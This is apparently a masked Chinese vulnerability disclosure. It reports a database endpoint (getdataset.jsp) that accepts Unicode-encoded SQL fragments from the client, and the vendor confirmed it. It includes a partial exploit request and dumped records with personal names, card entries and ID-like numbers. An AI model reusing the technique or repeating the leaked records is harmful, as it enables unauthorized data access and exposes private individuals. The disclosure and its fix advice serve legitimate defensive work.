2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经确认,细节仅向厂商公开
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开
设计缺陷,求帮打马赛克
1.http://**.**.**/login_czw.jsp_*****2a842dc479c2.png" alt=&quo**********^已经注册^**********feaadadba54e.png" alt=&quo**********此时系统会向^**********ode*****2.://**.**.**//**.**.**.**/public/getdataset.jsp HTTP/1.1_*****t: **********uage: ***********.**/szpt/we**********on/x-www-for**********: gzip, **********IE 9.0; Windows NT 6************.************ength********** Keep-********** no-**********R2offKyOG08Kp7********************5F$u0075$u0073$u0065$u0072 $u0077$u0068$u0065$u0072$u0065 c_mobileno='^**********de&g********************^^的而且使^**********^^以^**********ode**********0066$u0072$u006F$u006**********de&g**********^^^**********42910774d056.png" alt=&quo*****
*****^^数大^**********c7fdf05bf3bf.png" alt=&quo**********ode**********);var rs=new js**********e("z**********BLE_NAME",&q**********String",&qu**********LGY_ZRQ",&q**********OUSE_TMP",&**********NFO_BZ",&qu**********O_BZ_TMP1",&**********BZ_TMP1_BAK",**********ERSON",&quo**********BSJ_LOG",&q**********CARDNO",&q**********JNLK",&quo**********20130609",&q**********LK_0531",&q**********_20130531",&**********LK_BF",&quo**********LK_HIS",&qu**********LK_JK",&quo**********LK_JK0913",**********LK_OLD",&qu**********JWLK",&quo**********JWLK_JK",&**********XX_HF",&quo**********TDCY",&quo**********_COUNT",&q**********MP","**********FZ_ZJSL",&q**********nd********************de&g**********t;,"14036429**********c250d1b496e4.png" alt=&quo**********有姓名被编^**********ode**********uot;INSERTFLAG","SUNIT_CODE","SORG_LOGGED","SORG_LOGGED_ID","SWHO_LOGGED","DWHEN_LOGGED","SCANCEL_SIGN","DWHEN_CANCELLED","S**********de&g********************^^**********3f3d8d452aae.png" alt=&quo******************************这^**********t;,"1868**********^量^**********f59daf2232b9.png" alt=&quo**********^^看**********40d06cc8dac2.png" alt=&quo**********ode**********;2011-06-11 11:37:28.0","fazcbg",null,null,null,"2011-06-10 13:42:06.0","3509811014",null,"fazcbg",null,"1307684230859",null,"1","0","其他&q**********37:46.0","2011-06-11 01:49:55.0","古田县华侨大厦",null,null,null,"2011-06-10 13:42:34.0","3522270029",null,"gthqds",null,"1307684266625",null,"1&**********0","0036","0036","牡丹卡",null,"2008-11-21 18:25:29.0","3504020018","2008-11-23 12:35:10.0","0036",null,null,null,"4","1",null**********;8119","牡丹卡",null,"2008-11-21 18:25:31.0","3504810019","2008-11-22 14:48:28.0","8119",null,null,null,"4","1",null,"2008-11-21**********","8016",null,"牡丹卡",null,"2008-11-21 18:25:34.0","3504280016",null,"8016",null,null,null,"1","1",null,"2008-1**********;2008-11-22 15:12:58.0","陈丽华","陈丽华","牡丹卡",null,"2008-11-21 18:25:54.0","3504260018","2008-11-22 15:12:58.0",null,null,null,null,"4&q**********11-23 
09:18:22.0","0327","0054","牡丹卡",null,"2008-11-21 18:25:57.0","3504030027","2008-11-23 09:18:22.0",null,null,null,null,"4",&quo**********t;2008-11-24 21:03:38.0","8019","8019","牡丹卡",null,"2008-11-21 18:26:06.0","3504280019","2008-11-24 21:03:38.0","8019",null,null,null,"4&**********07 21:12:33.0","2717","2717","牡丹卡",null,"2008-11-21 20:52:31.0","3504270017","2008-12-07 21:12:33.0","2717",null,null,null,"4","1&quo**********06-28 20:49:49.0","2909",null,"牡丹卡",null,"2008-11-21 20:52:40.0","3504290009",null,"2909",null,null,null,"1","1&q**********","0042","牡丹卡",null,"2008-11-21 20:52:47.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1",nul**********","0054","0054","牡丹卡",null,"2008-11-21 20:52:58.0","3504030027","2008-11-22 10:09:20.0","0054",null,null,null,"4","1",null,&**********54:34.0","8134","8134","牡丹卡",null,"2008-11-21 20:53:09.0","3504810034","2009-02-11 17:54:34.0",null,null,null,null,"4","1&q**********;,"0042","0042","牡丹卡",null,"2008-11-21 20:43:35.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1&q**********-24 11:17:32.0","唐加联","唐加联","牡丹卡",null,"2008-11-21 20:43:37.0","3504250012","2008-11-24 11:17:32.0",null,null,null,null,"4"**********0","2009-03-20 14:17:18.0","0202",null,"牡丹卡",null,"2008-11-21 20:43:44.0","3504020002",null,"0202",null,null,null,"1","1&quo**********"2009-03-17 00:39:10.0","0244",null,"牡丹卡",null,"2008-11-21 20:43:49.0","3504020044",null,"0244",null,null,null,"1",&q**********2:09.0","2008-11-22 10:31:30.0","2714","2714","牡丹卡",null,"2008-11-21 20:43:54.0","3504270014","2008-11-22 10:31:30.0",null,null,null,null,&quo**********quot;2011-06-11 14:05:58.0","东侨长兴足浴",null,null,null,"2011-06-10 13:42:35.0","3509990799",null,"dqcxzy",null,"1307684273234",null,"1","0",&quo**********nd********************de&g**********^^*****
不要由客户端传递 SQL 语句:请求中不应携带 SQL 片段(即使经过编码),查询应在服务端以参数化方式构造,客户端只提交查询参数。
危害等级:中
漏洞Rank:7
确认时间:2015-11-29 16:10
感谢提交!!验证确认所描述的问题,已通知其修复。
暂无